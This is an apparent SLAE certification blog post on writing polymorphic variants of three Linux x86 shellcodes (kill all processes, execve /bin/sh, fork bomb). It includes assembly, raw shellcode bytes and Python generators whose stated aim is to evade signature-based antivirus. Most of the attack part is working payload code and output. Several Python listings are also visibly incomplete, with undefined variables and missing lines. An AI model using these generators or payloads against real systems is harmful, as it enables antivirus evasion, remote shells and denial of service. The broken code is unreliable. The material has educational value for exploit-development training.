Paolo Perego
Paolo Perego Specialista di sicurezza applicativa e certificato OSCE e OSCP, amo spaccare e ricostruire il codice in maniera sicura. Sono cintura nera di taekwon-do, marito e papà. Ranger Caotico Neutrale, scrivo su @codiceinsicuro.

Assignment #6: Generate polymorphic shellcodes

7890 parole - Lo leggerai in 43 minuti

The sixth assignment for SLAE certification is to take up 3 shellcodes from Shell-Storm and create polymorphic versions of them to beat pattern matching. The polymorphic versions cannot be larger 150% of the existing shellcode. Bonus points for making it shorter in lenght than original

The assignment was written on an Ubuntu Linux 18.04, with a Linux kernel 4.15 version.


A polymorphic shellcode is a a code derivated by an original code with some instructions substituted with equivalent piece of code.

As example, this piece of code

mov al, 0x11

can be rewritten as

mov bl, 0x12
mov al, 0x1

sub bl, al
xchg al, bl

The outcome of the second assembly fragment is to put 0x11 in the EAX register in an indirect way.

The purpose of such rewriting is to bypass signature based antivirus checks and having our shellcode to be executed on our target system. The goal is to have a different code on every execution but equivalen in terms of effect.

Kill it me softly

The first shellcode is a kill -1 code, that terminates all processes. The shellcode it can be found here:

The kill(2) system call prototype is:

int kill(pid_t pid, int sig);

From the man page:

If pid equals -1, then sig is sent to every process for which the calling > process has permission to send signals, except for process 1 (init), but see below.

So, our purpose is to write a C piece of code that execute a kill(-1, 9) since 9 is the SIGKILL signal.

Original code is 11 byte long. For the assignment engagement rule, the modified code can’t be longer than 150% of the orignal one, that it is 16 bytes (and an half :-)).

; kill-em-all original shellcode

section .text

global _start

  ; kill(-1, SIGKILL)
  push byte 37
  pop eax
  push byte -1
  pop ebx
  push byte 9
  pop ecx
  int 0x80

To create a first alternate version, we can separate shellcode parts in smaller ones and then rewrite in an alternative way:

  • set EAX to 0x25 (that is 37 in decimal, the code to kill(2) system call as defined in /usr/include/i386-linux-gnu/asm/unistd_32.h)
  • set EBX to -1, since we want to launch the signal to every process
  • set ECX to 9, since it is the code for the SIGKILL signal (as defined in /usr/include/asm-generic/signal.h)
  • call INT 0x80
section .text

global _start

	xor ebx, ebx

	mov cl, byte [data]
	mov al, byte [data+1]

	dec ebx
	int 0x80

data: 	db 0x25, 0x09

This first kill_em_all variant is 18 bytes long, so it doesn’t fit my assignment rules and it can’t be a feasible solution.

I’ll change then the byte assignment, not using a define byte approach but a direct load, instead:

; Filename: 	kill_second_variant.nasm
; Author:	Paolo Perego <>
; Website:
; Blog post:
; Twitter:   	@thesp0nge
; SLAE-ID:    	1217
; Purpose:	This is my second variant for kill -9 -1 shellcode. This
;		shellcode is 13 byte long and I will use it as a skeleton for
;		polymorphic generator.

section .text

global _start

	xor ebx, ebx
	xor eax, eax
	xor ecx, ecx

	mov cl, 0x25
	mov al, 0x9

	dec ebx
	int 0x80

This shellcode, when compiled into binary, is only 13 bytes long that is inside our engagement rules.

 % objdump -d kill_second_variant

kill_second_variant:     file format elf32-i386

Disassembly of section .text:

08048080 <_start>:
 8048080:	31 db                	xor    %ebx,%ebx
 8048082:	31 c0                	xor    %eax,%eax
 8048084:	31 c9                	xor    %ecx,%ecx
 8048086:	b1 25                	mov    $0x25,%cl
 8048088:	b0 09                	mov    $0x9,%al
 804808a:	4b                   	dec    %ebx
 804808b:	cd 80                	int    $0x80

Now with those two fixes values loaded into cl and al it’s easy to derive other variations. We can start from this to create some other polymorphic versions, using some strategies like:

  • swap system call parameter positions
  • add some NOPs
  • perform NOP equivalent operations
  • use math to calculate values to fill EAX, EBX and ECX to reach the desired value with some more clock cycles

Kill shake

Kill shellcode can be divided in three atomic patterns that can be swapped each other:

  • XOR-ing EBX and decrementing it
  • MOV AL to 0x9
  • MOV CL to 0x25

Given this, the following python snippet realize the swapping strategy for our kill -9 -1 shellcode:

def kill_shuffle():
    blk=["\\x31\\xdb\\x4b", "\\x31\\xc9\\xb1\\x25", "\\x31\\xc0\\xb0\\x09"];

    return "".join(newblk)+"\\xcd\\x80";

As you can see in the following picture, some polymorphic variant of the original shellcode can be easily generated, without penalty on lenght:

Kill Swap variations

NOP dope

Another transformation strategy can be adding NOPs. However, in order to have some more magic, I’ll mix the NOPs strategy with shuffling.

I’ll add a number of NOPs that let our shellcode to stay under 16 bytes in lenght.

def kill_nop_dope():
    blk=["\\x31\\xdb\\x4b", "\\x31\\xc9\\xb1\\x25", "\\x31\\xc0\\xb0\\x09"];
    n = randint(0, 3); # our shellcode is 13 byte lenght, we can expand it no more than 3 bytes
    nop = ["\\x90"]*n


    return "".join(newblk)+"\\xcd\\x80";

Kill NOP variations

Some quick improvements

With only three words that they can be swapped each other, there is no too much space for entropy. Let’s split the original shellcode into two main section:

  • initialization
  • system call setup

With this approach, the two strategies described before will result in:

def kill_shuffle():
    init_blk =["\\x31\\xdb", "\\x31\\xc9", "\\x31\\xc0"];
    setup_blk=["\\x4b", "\\xb1\\x25", "\\xb0\\x09"];

    return "".join(init_blk)+"".join(setup_blk)+"\\xcd\\x80";

def kill_nop_dope():
    init_blk =["\\x31\\xdb", "\\x31\\xc9", "\\x31\\xc0"];
    setup_blk=["\\x4b", "\\xb1\\x25", "\\xb0\\x09"];
    n = randint(0, 3); # our shellcode is 13 byte lenght, we can expand it no more than 3 bytes
    nop_blk = ["\\x90"]*n

    return "".join(init_blk)+"".join(setup_blk)+"\\xcd\\x80";

Wasting CPU time

As a PoC for a polymorphic generator script, I wrote a bunch of instruction that they can be placed everywhere in the shellcode without interfering with the final result.

 42                   	inc    %edx
 4a                   	dec    %edx
 50                   	push   %eax
 53                   	push   %ebx
 51                   	push   %ecx
 52                   	push   %edx

This is the python script filling the shellcode with some NOP equivalent instruction. Of course, to meet our SLAE assignment rule in size, we can select only 3 of them, but in a real case scenario it will be fun feeding a buffer with a very large nonsense opcode list.

def kill_nop_super_dope():
    init_blk =["\\x31\\xdb", "\\x31\\xc9", "\\x31\\xc0"];
    setup_blk=["\\x4b", "\\xb1\\x25", "\\xb0\\x09"];
    nop_blk=["\\x90", "\\x6a\\x$$", "\\x42", "\\x4a", "\\x50", "\\x53", "\\x51", "\\x52"]

    n = randint(0, 3); # our shellcode is 13 byte lenght, we can expand it no more than 3 bytes
    par = randint(1,255);


    shellcode=tmp.replace("$$", str(par));
    return shellcode

Doing math…

Using math to substitute MOV instructions is too much expensive in terms of byte added to original shellcode and it could not be considered as a successfull strategy to deal with the < +150% rule engagement.

However, in a real case scenario, it can be a feasible way to make reversing much difficult if there are no constraints in target buffer size.

So please, not consider this for SLAE but only for fun. I just implemented, as PoC a math strategy based on DIV instruction. This piece of python code will create the assembly code needed to load DL with a random number between 1 and FF since we want to store DIV result in AL and the reminder, 0, to AH. We will load AX with the target number multiplied by this random number and then call “DIV DL”.

Since the division reminder is 0, there is no need to XOR the register to init it to 0.

def kill_div_for_mov(n, mov_to_cl=False):
    # DIV stores result in AX and if the divider is 1 byte long, the result is
    # in AL and reminder in AH
    # e.g.
    #   AL = 37
    #   AH = 0
    #   Our code here will calculate an initializer number for EAX this way:
    #       DL = random number between 1..FF
    #       EAX = 37 * DL
    # After the last div, n will be stored in AL and AH will be 0.
    # The impact in terms of byte is +4 bytes every MOV substituted with the
    # DIV. The impact is +6 when the value must be in another register but EAX.
    # This strategy is too expensive in terms of shellcode lenght and *MUST
    # NOT* be considered in the SLAE assignment solutions.

    dl_value = randint(1, 255);
    ax_value = n * dl_value;

    val = socket.htons(ax_value);   # now the value is in network byte order
                                    # like the way it would be stored into
                                    # the stack

    hex_val = format(val, 'x');
    mov_ax = "\\x66\\xb8\\x"+hex_val[0:2]+"\\x"+hex_val[2:4];
    mov_dl = "\\xb2\\x"+format(dl_value, 'x');
    div_dl = "\\xf6\\xf2";

    code = mov_ax+mov_dl+div_dl;

    if mov_to_cl == True:
        code += "\\x89\\xc1";       # mov ecx, eax

    return code;

Kill with math

This line will create the kill them all shellcode with the div strategy. Please note that we first invoke the CL set and then AL value.

shellcode="\\x31\\xc0\\x31\\xdb\\x31\\xc9"+kill_div_for_mov(9, True)+kill_div_for_mov(37, False)+"\\x4b\\xcd\\x80";

The polymorphic generator for kill(-9, -1)

Here it is the python script using the described strategies to create a polymorphic version of kill -9, -1 shellcode.

#!/usr/bin/env python

from random import randint, shuffle;
import sys, getopt;
import socket;

def help():
    print sys.argv[0] + " [options]"
    print "Valid options:"
    print "\t-h, --help: show this help"
    print "\t-s, --shuffle: use SHUFFLE strategy on operands"
    print "\t-n, --nop: add a random number of NOPs to the shellcode"
    print "\t-N, --nop-equivalent: add some NOP equivalent instruction to the code"
    print "\t-m, --math: use math strategy for MOV"
    return 0

def kill_shuffle():
    init_blk =["\\x31\\xdb", "\\x31\\xc9", "\\x31\\xc0"];
    setup_blk=["\\x4b", "\\xb1\\x25", "\\xb0\\x09"];

    return "".join(init_blk)+"".join(setup_blk)+"\\xcd\\x80";

def kill_nop_dope():
    init_blk =["\\x31\\xdb", "\\x31\\xc9", "\\x31\\xc0"];
    setup_blk=["\\x4b", "\\xb1\\x25", "\\xb0\\x09"];
    n = randint(0, 3); # our shellcode is 13 byte lenght, we can expand it no more than 3 bytes
    nop_blk = ["\\x90"]*n

    return "".join(init_blk)+"".join(setup_blk)+"\\xcd\\x80";

def kill_nop_super_dope():
    init_blk =["\\x31\\xdb", "\\x31\\xc9", "\\x31\\xc0"];
    setup_blk=["\\x4b", "\\xb1\\x25", "\\xb0\\x09"];
    nop_blk=["\\x90", "\\x6a\\x$$", "\\x42", "\\x4a", "\\x50", "\\x53", "\\x51", "\\x52"]

    n = randint(0, 3); # our shellcode is 13 byte lenght, we can expand it no more than 3 bytes
    par = randint(1,255);


    shellcode=tmp.replace("$$", str(par));
    return shellcode

def kill_div_for_mov(n, mov_to_cl):
    # DIV stores result in AX and if the divider is 1 byte long, the result is
    # in AL and reminder in AH
    # e.g.
    #   AL = 37
    #   AH = 0
    #   Our code here will calculate an initializer number for EAX this way:
    #       DL = random number between 1..FF
    #       EAX = 37 * DL
    # After the last div, n will be stored in AL and AH will be 0.
    # The impact in terms of byte is +4 bytes every MOV substituted with the
    # DIV. The impact is +6 when the value must be in another register but EAX.
    # This strategy is too expensive in terms of shellcode lenght and *MUST
    # NOT* be considered in the SLAE assignment solutions.

    dl_value = randint(1, 255);
    ax_value = n * dl_value;

    val = socket.htons(ax_value);   # now the value is in network byte order
                                    # like the way it would be stored into
                                    # the stack

    hex_val = format(val, 'x');
    mov_ax = "\\x66\\xb8\\x"+hex_val[0:2]+"\\x"+hex_val[2:4];
    mov_dl = "\\xb2\\x"+format(dl_value, 'x');
    div_dl = "\\xf6\\xf2";

    code = mov_ax+mov_dl+div_dl;

    if mov_to_cl == True:
        code += "\\x89\\xc1";       # mov ecx, eax

    return code;

def create_add_shellcode():
    r1=randint(1, 36);
    r2=randint(1, 8);

    return sc;

def main(argv):

        opts, args=getopt.getopt(argv, "hsnNm", ["help", "shuffle", "nop", "nop-equivalent", "math"])
    except getopt.GetoptError:

    for opt, arg in opts:
        if opt in ('-h', '--help'):
        elif opt in ('-A', '--add'):
        elif opt in ('-s', '--shuffle'):
        elif opt in ('-n', '--nop'):
        elif opt in ('-N', '--nop-equivalent'):
        elif opt in ('-m', '--math'):
            shellcode="\\x31\\xc0\\x31\\xdb\\x31\\xc9"+kill_div_for_mov(9, True)+kill_div_for_mov(37, False)+"\\x4b\\xcd\\x80";

    print "Shellcode: ", shellcode
    print "Length: ", len(shellcode)/4

if __name__ == "__main__":

Some shellcodes

Here it is some shellcodes created using the aforementioned script.

% ./ -s
Shellcode:  \x31\xdb\x31\xc9\x31\xc0\xb0\x09\xb1\x25\x4b\xcd\x80
Length:  13
% ./ -s
Shellcode:  \x31\xdb\x31\xc0\x31\xc9\xb1\x25\xb0\x09\x4b\xcd\x80
Length:  13
% ./ -n
Shellcode:  \x31\xc9\x31\xc0\x31\xdb\xb0\x09\x4b\x90\xb1\x25\xcd\x80
Length:  14

% ./ -n Shellcode: \x31\xc9\x31\xc0\x31\xdb\xb0\x09\xb1\x25\x4b\xcd\x80 Length: 13 % ./ -N Shellcode: \x31\xdb\x31\xc0\x31\xc9\xb0\x09\xb1\x25\x4b\x4a\xcd\x80 Length: 14 % ./ -N Shellcode: \x31\xc9\x31\xdb\x31\xc0\x4b\xb1\x25\x90\x4a\xb0\x09\xcd\x80 Length: 15 % ./ -N Shellcode: \x31\xc9\x31\xdb\x31\xc0\xb0\x09\x4b\xb1\x25\xcd\x80 Length: 13

Exec me a shell…

The original shellcode

The original shellcode it can be found here:

It is a 30 bytes shellcode for a partially obfuscated execve() call.

00000000  31C9              xor ecx,ecx
00000002  F7E9              imul ecx
00000004  51                push ecx
00000005  040B              add al,0xb
00000007  EB08              jmp short 0x11
00000009  5E                pop esi
0000000A  87E6              xchg esp,esi
0000000C  99                cdq
0000000D  87DC              xchg ebx,esp
0000000F  CD80              int 0x80
00000011  E8F3FFFFFF        call dword 0x9
00000016  2F                das
00000017  62696E            bound ebp,[ecx+0x6e]
0000001A  2F                das
0000001B  2F                das
0000001C  7368              jnc 0x86

The basic idea is to use the call trick, as seen on assignment 5. After setting EAX to be filled with 0x11, that it is the opcode for execve() shellcode, there is a JUMP on a CALL instruction that set the EIP to a pop $esi, since in that register it will be stored the memory address of the executable to be called, “/bin/sh” that seems to be obfuscated, this way.

First variation

The basic idea here is that:

  • EAX must be filled with 0xb;
  • EBX must point to a location filled with “/bin/sh”;
  • ECX and EDX can be set to 0.

As we did it for the kill(), we can split the shellcode into pieces so that it would be easier to write variations. For SLAE engagement rules, we must create shellcodes not longer than 45 bytes.

First step, let’s init registers.

	push byte 0xb
	pop eax
	xor ecx, ecx
	push ecx
	pop edx

After this, there is the “call” trick:


	jmp short shell

	pop ebx
	int 0x80

	call dword flow

And then, after the last call, there is the “/bin//sh” payload encoded as they were assembly opcodes.

	bound ebp,[ecx+0x6e]
	jae $+0x6a

The encoded payload

The execve() shellcode variant is 25 byte long, instead of 30 bytes of the original shellcode taken from the website.

; Filename:
; Author:	Paolo Perego <>
; Website:
; Twitter:   	@thesp0nge
; SLAE-ID:    	1217
; Purpose:	Polymorphic variation for an obfuscated shellcode

global _start

section .text

	; INIT Registers
	push byte 0xb
	pop eax
	xor ecx, ecx
	push ecx
	pop edx

	jmp short shell

	pop ebx
	int 0x80

	call dword flow
	bound ebp,[ecx+0x6e]
	jae $+0x6a

The disassembled executable is:

thesp0nge@SLAE /media/sf_SLAE_Course/SLAE/Assignment_6/exec
 %      objdump -d exec_variant

exec_variant:     file format elf32-i386

Disassembly of section .text:

08048080 <_start>:
 8048080:	6a 0b                	push   $0xb
 8048082:	58                   	pop    %eax
 8048083:	31 c9                	xor    %ecx,%ecx
 8048085:	31 d2                	xor    %edx,%edx
 8048087:	eb 03                	jmp    804808c <shell>

08048089 <flow>:
 8048089:	5b                   	pop    %ebx
 804808a:	cd 80                	int    $0x80

0804808c <shell>:
 804808c:	e8 f8 ff ff ff       	call   8048089 <flow>
 8048091:	2f                   	das
 8048092:	62 69 6e             	bound  %ebp,0x6e(%ecx)
 8048095:	2f                   	das
 8048096:	2f                   	das
 8048097:	73 68                	jae    8048101 <_end+0x65>

To fulfill our constraints, we’ve got 20 bytes to spend in NOP equivalent instructions. We will use the same approach as used as in the kill example.

Shake execution

The first polymorphic strategy is to swap system call parameter position. For such a reason, we will change the init part of our assignment first solution, in order to have an indipendent init routine for EDX. This way, the number of changes we can do it, it will raise.

Let’s rewrite the first block this way:

6a 0b                	push   $0xb
58                   	pop    %eax
31 c9                	xor    %ecx,%ecx
31 d2                	xor    %edx,%edx

However, since the init part is very small here and we’ve got only one register to setup, there are only 3 possible shellcodes using this strategy:

def exec_shuffle():
    init_blk =["\\x6a\\x0b", "\\x31\\xc9", "\\x31\\xd2"];

    return "".join(init_blk)+"\\x58\\xeb\\x03\\x5b\\xcd\\x80\\xe8\\xf8\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68";

( Exec polymorphic shellcodes using opcode shuffle

The other shellcode sections can’t be shuffled, so this is not a wise strategy to create different polymorphic version of our obfuscated execve shellcode.

Here there are some shellcode generated this way:

thesp0nge@SLAE /media/sf_SLAE_Course/SLAE/Assignment_6/exec
 % ./ -s
Shellcode:  \x31\xd2\x31\xc9\x6a\x0b\x58\xeb\x03\x5b\xcd\x80\xe8\xf8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x2f\x73\x68
Length:  25
thesp0nge@SLAE /media/sf_SLAE_Course/SLAE/Assignment_6/exec
 % ./ -s
Shellcode:  \x31\xd2\x6a\x0b\x31\xc9\x58\xeb\x03\x5b\xcd\x80\xe8\xf8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x2f\x73\x68
Length:  25
thesp0nge@SLAE /media/sf_SLAE_Course/SLAE/Assignment_6/exec
 % ./ -s
Shellcode:  \x31\xc9\x6a\x0b\x31\xd2\x58\xeb\x03\x5b\xcd\x80\xe8\xf8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x2f\x73\x68
Length:  25

NOP dope for exec

Here we’ve got 10 bytes to waste and a single NOP is 1 byte opcode, so we can add \x90 ten times and in a very large number of ways.

However, please note that this strategy is very easy to detect and defeat. Adding tons of NOPs make a clever analyist to easily detect there is some other stuff under the wood.

However, since this is just a PoC for an exam, let’s use this strategy also for this shellcode.

def exec_nop_dope():
    init_blk =["\\x6a\\x0b\\x58", "\\x31\\xc9", "\\x31\\xd2"];
    setup_blk=["\\x5b", "\\xcd\\x80", "\\xe8\\xf8\\xff\\xff\\xff"];

    n = randint(0, 10);
    init_nop_blk = ["\\x90"]*(n/3)
    setup_nop_blk = ["\\x90"]*(n*2/3)



    return "".join(init_blk)+"\\xeb\\x03"+"".join(setup_blk)+"\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68";

After generated a shellcode and tried with my C skeleton program, no shell popped out. Lucky enough we’ve got GDB in help to understand why.

A mess to deal with jump and code injection

As you can see from the picture, the NOPs we inserted they break our jump and call offsets. In particular, the “\xeb\x03| opcode, make a 3 byte relative jump because the shell label was just a “\x5b\xcd\x80” bytes away. We have to adjust the \xeb parameter accordingly to have our “jmp shell” logical step to work as expected.

Now that the jump works as expected, our shellcode still goes in an infinite loop.

Another infinite loop

After a GDB session, that turns to be my best friend in those latest days, it turns that I made a big logical mistake. The “\x5b” instruction, pop $ebx, must be executed right after the call and the added NOPs break also the relative jump back, so eventually some generated shellcodes don’t execute the pop instruction.

The call instruction, from the documentation founds on the Internet, add a signed offset to the instruction following the call itself, to jump at the label we want to reach.

In our original shellcode we’ve got:

 8048087:	eb 03                	jmp    804808c <shell>

08048089 <flow>:
 8048089:	5b                   	pop    %ebx
 804808a:	cd 80                	int    $0x80

0804808c <shell>:
 804808c:	e8 f8 ff ff ff       	call   8048089 <flow>
 8048091:	2f                   	das

The “\xe8” is the opcode for the CALL instruction and the other part is a 32 bit signed offset, relative to the instruction following the CALL.

We need to make a jump long 7 bytes in a backward direction, that is \xFF-\x07=\xF8

Then we need to adjust our jump accordingly. When we corrected the first JMP, we want to reach the beginning of the call, now I want to reach the “\x5b”.

After all modifications, and some more GDB sessions to fight against offsets, it turned out that this is the correct JMP/CALL offset adjustment implementation:

def exec_nop_dope():
    init_blk =["\\x6a\\x0b\\x58", "\\x31\\xc9", "\\x31\\xd2"];
    setup_blk=["\\x5b" ];

    n = randint(0, 10);
    init_nop_blk = ["\\x90"]*(n/3)
    setup_nop_blk = ["\\x90"]*(n*2/3)



    # The first JMP address is our setup_blk array lenght + 2
    # The second CALL address is FF - our setup_blk array lenght - 6
    jmp_adj = byte_len(setup_blk) + 2
    call_adj = format((255 - byte_len(setup_blk) - 6), 'x')

    return "".join(init_blk)+"\\xeb\\x0"+str(jmp_adj)+"".join(setup_blk)+"\\xcd\\x80\\xe8\\x"+str(call_adj)+"\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68";

Even more wasted CPU time

The third strategy I want to use in my exec shell shellcode polymorphic generator, is to add some NOP equivalent operations.

The lesson learnt in the previous NOP dope chapter is that I have to deal carefully with JMP and CALL offset tuning.

 % cat nop_equivalent.nasm
global _start

section .text

	cmp eax, 0x0
	cmp ebx, 0x0
	cmp ecx, 0x0
	xchg eax, eax
	xchg ebx, ebx
	xchg ecx, ecx

 % objdump -d nop_equivalent

nop_equivalent:     file format elf32-i386

Disassembly of section .text:

08048080 <_start>:
 8048080:	90                   	nop
 8048081:	83 f8 00             	cmp    $0x0,%eax
 8048084:	83 fb 00             	cmp    $0x0,%ebx
 8048087:	83 f9 00             	cmp    $0x0,%ecx
 804808a:	90                   	nop
 804808b:	87 db                	xchg   %ebx,%ebx
 804808d:	87 c9                	xchg   %ecx,%ecx

Please note how the opcode is xchg eax, eax is 0x90 like NOP. I choose not to use PUSH and POP instructions, because not to mess it up with legal push and pop I executed in the shellcode. Of course, it is possible to inject stack operations preserving the ones we need to do, however I want to make it simple just to show this assignment solution.

def byte_len(array_string):
    return "".join(array_string).count("\\x")


def kill_nop_super_dope():

    init_blk =["\\x6a\\x0b\\x58", "\\x31\\xc9", "\\x31\\xd2"];
    setup_blk=["\\x5b" ];

    nop_blk=["\\x90", "\\x83\\xf8\\x$$", "\\x83\\xfb\\x??", "\\x83\\xf9\\x%%", "\\x87\\xdb", "\\x87\\xc9"]

    n = randint(0, 10);
    init_nop_blk = nop_blk[0:(n/3)]
    setup_nop_blk = nop_blk[0:(n*2/3)]


    print init_nop_blk
    print init_blk



    jmp_adj = format(byte_len(setup_blk) + 2, '02x')
    call_adj = format((255 - byte_len(setup_blk) - 6), 'x')

    tmp= "".join(init_blk)+"\\xeb\\x"+str(jmp_adj)+"".join(setup_blk)+"\\xcd\\x80\\xe8\\x"+str(call_adj)+"\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68";

    par = randint(1,255);
    shellcode=tmp.replace("$$", str(format(par, 'x')));
    par = randint(1,255);
    shellcode=shellcode.replace("??", str(format(par, 'x')));
    par = randint(1,255);
    shellcode=shellcode.replace("%%", str(format(par, 'x')));
    return shellcode

No black magic here. It’s the same approach used with NOPs but with some more instructions having no effect on the program logical flow.

Do some math

Last strategy I would use to create polymorphic version of my first execve variant is to do some math to fill registers with the desired values.

In this payload, we want to achieve the following register status:

|—|——-| |register|value| | EAX | 0xb | | ECX | 0x0 | | EDX | 0x0 | |—|——-|

EBX is filled up with a pointer, so I won’t use math for it.

As simple PoC for my polymorphic generator python script, I will use SUB instruction for EAX electing a random number and subtracting the correspondant to reach 0xb.

To init ECX and EDX to 0, I’ll use the following instructions:

	sub 	ecx, ecx
	sub 	edx, edx
	andn	ecx, ecx, ecx
	andn	edx, edx, edx

	push 0x3
	pop ecx
	sub cl, 0x3

	push 0x7F
	pop edx
	sub dl, 0x7F

The following python routine is the one used to create shellcode variations.

def exec_sub_strategy():

    # EAX = 0xb

    init_eax = ["\\x29\\xc0\\xb0\\x??\\x2c\\x$$"];
    par = randint(1, 255)
    eax = "".join(init_eax)
    eax = eax.replace("??", str(format(par, 'x')))
    eax = eax.replace("$$", str(format(par-11, 'x')))

    init_ecx = ["\\x31\\xc9", "\\xc4\\xe2\\x70\\xf2\\xc9", "\\x6a\\x??\\x59\\x80\\xe9\\x??"]
    par = randint(1, 127)
    ecx = "".join(init_ecx[0])
    ecx = ecx.replace("??", str(format(par, 'x')))

    init_edx = ["\\x31\\xd2", "\\xc4\\xe2\\x68\\xf2\\xd2", "\\x6a\\x??\\x5a\\x80\\xea\\x??"]
    par = randint(1, 127)
    edx = "".join(init_edx[0])
    edx = edx.replace("??", str(format(par, 'x')))

    init_blk = [eax, ecx, edx]
    return "".join(init_blk)+"\\xeb\\x03\\x5b\\xcd\\x80\\xe8\\xf8\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68";

Fork bomb

The original shellcode

The original shellcode it can be found here:

The code is very easy. The fork() system call has no parameter and its listed with number 2 in the system call list.

Fork system call number

section .text
global _start

    push byte 2
    pop eax
    int 0x80
    jmp short _start

The shellcode is only 7 bytes long (“\x6a\x02\x58\xcd\x80\xeb\xf9”), so our variants can’t be longer than 10,5 bytes. This will limit us very hard when creating the generator script.

First variation

The idea behind this variation is super easy: put in EAX the value 2 and call INT 0x80 then repeat in a loop the whole process.

The first easy variation is not using the push/pop technique to init EAX, but XOR-ing the register and moving 0x2 instead.

section .text
global _start

	xor eax, eax
	mov al, 0x2

	int 0x80
	jmp short _start

This results in a 8 bytes shellcode, so just 1 bytes more than the original one:

thesp0nge@SLAE /media/sf_SLAE_Course/SLAE/Assignment_6/fork
 % objdump -d forkbomb_variant

forkbomb_variant:     file format elf32-i386

Disassembly of section .text:

08048080 <_start>:
 8048080:	31 c0                	xor    %eax,%eax
 8048082:	b0 02                	mov    $0x2,%al
 8048084:	cd 80                	int    $0x80
 8048086:	eb f8                	jmp    8048080 <_start>

Now, let’s create our polymorphic generator script for fork bombing shellcode.

Shuffle it!

Unfortunately, the shellcode is too short to shuffle operands. So this strategy doesn’t work this time.

Can't shuffle this time

Add some NOPs

Even this strategy lacks of interest. In our variation, the MOV instruction must be executed after the XOR and both of them, they must be executed right before the INT.

So we can inject some NOPs in between each instructions but creating a sled, since it would be easy for an analyst to detect.

def fork_nop_dope():
    init_blk =["\\x31\\xc0"];
    setup_blk=["\\xb0\\x02" ];

    n = randint(0, 3);
    init_nop_blk = ["\\x90"]*(n/3)
    setup_nop_blk = ["\\x90"]*(n*2/3)



    jmp_adj = 255 - byte_len(init_blk) - byte_len(setup_blk) - 3

    return "".join(init_blk)+"".join(setup_blk)+"\\xcd\\x80\\xeb\\x"+format(jmp_adj, '02x');

Add some NOP equivalent instruction

To solve this, I used the same NOP equivalent instructions used in execve() shellcode.

The python script used to create polymorphic versions using this strategy is this one. A big improvement can be rewriting the JMP instruction with some jump equivalent, maybe adding some always true condition.

def kill_nop_super_dope():

    init_blk =["\\x31\\xc0"];
    setup_blk=["\\xb0\\x02" ];

    nop_blk=["\\x90", "\\x83\\xf8\\x$$", "\\x83\\xfb\\x??", "\\x83\\xf9\\x%%", "\\x87\\xdb", "\\x87\\xc9"]

    n = randint(0, 10);
    init_nop_blk = nop_blk[0:(n/3)]
    setup_nop_blk = nop_blk[0:(n*2/3)]



    jmp_adj = format((255 - byte_len(init_blk) - byte_len(setup_blk) - 3), '02x')


    par = randint(1,255);
    shellcode=shellcode.replace("$$", str(format(par, 'x')));
    par = randint(1,255);
    shellcode=shellcode.replace("??", str(format(par, 'x')));
    par = randint(1,255);
    shellcode=shellcode.replace("%%", str(format(par, 'x')));
    return shellcode

Do some math

For the math strategy, I used the same approach used in execve example, adding some add and sub instructions for EBX, ECX and EDX registers that doesn’t need to have a meaningful value.

global _start

section .text

	sub	eax, eax
	mov	al, 0xF3
	sub	al, 0xE2

	sub 	ebx, ebx
	sub 	ecx, ecx
	sub 	edx, edx

	andn	ebx, ebx, ebx
	andn	ecx, ecx, ecx
	andn	edx, edx, edx

	add ebx, 0x4
	add ecx, 0x5
	add edx, 0x6

	sub ebx, 0x4
	sub ecx, 0x5
	sub edx, 0x6

	push 0x3
	pop ebx

	push 0x4
	pop ecx

	push 0x5
	pop edx

This strategy can lead our shellcode to be very large, so it can’t be useful due to engagement rules.

Anyway, it is an interesting PoC and it leads to a very large number of shellcode variations.

The python method implementing this strategy is the following. In this case, we’ve got a lot of freedom in choosing values for EBX, ECX and EDX.

def fork_sub_strategy():

    # EAX = 0x2

    init_eax = ["\\x29\\xc0\\xb0\\x??\\x2c\\x$$"];
    par = randint(1, 255)
    eax = "".join(init_eax)
    eax = eax.replace("??", str(format(par, '02x')))
    eax = eax.replace("$$", str(format(par-2, '02x')))

    init_ebx = ["\\x29\\xdb","\\xc4\\xe2\\x60\\xf2\\xdb", "\\x83\\xc3\\x??", "\\x83\\xeb\\x??", "\\x6a\\x??", "\\x5b"];
    par = randint(1, 127)
    ebx = "".join(init_ebx[0])
    ebx = ebx.replace("??", str(format(par, '02x')))

    init_ecx = ["\\x31\\xc9", "\\xc4\\xe2\\x70\\xf2\\xc9", "\\x6a\\x??\\x59\\x80\\xe9\\x??", "\\x83\\xc1\\x??", "\\x83\\xe9\\x??", "\\x6a\\x??", "\\x59"];
    par = randint(1, 127)
    ecx = "".join(init_ecx[0])
    ecx = ecx.replace("??", str(format(par, '02x')))

    init_edx = ["\\x31\\xd2", "\\xc4\\xe2\\x68\\xf2\\xd2", "\\x6a\\x??\\x5a\\x80\\xea\\x??", "\\x83\\xc2\\x??", "\\x83\\xea\\x??", "\\x6a\\x??", "\\x5a"];

    par = randint(1, 127)
    edx = "".join(init_edx[0])
    edx = edx.replace("??", str(format(par, '02x')))

    init_blk = [eax, ebx, ecx, edx]
    setup_blk=["\\xb0\\x02" ];

    jmp_adj = format((255 - byte_len(init_blk) - byte_len(setup_blk) - 3), '02x')

    return shellcode

Lessons learnt

This assignment was the most complex one in terms of solutions. Creating a single poliymorphic variation was easy, but generating some arbitrary shellcodes requires a lot of attentions in not mangling program logic flow.

Another important thing I learnt in this assignment is that, GDB is one of my best friends and the .gdbinit file with the hook-stop function is one of the customization you have to care most of it.

SLAE Exam Statement

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

Student ID: SLAE-1217

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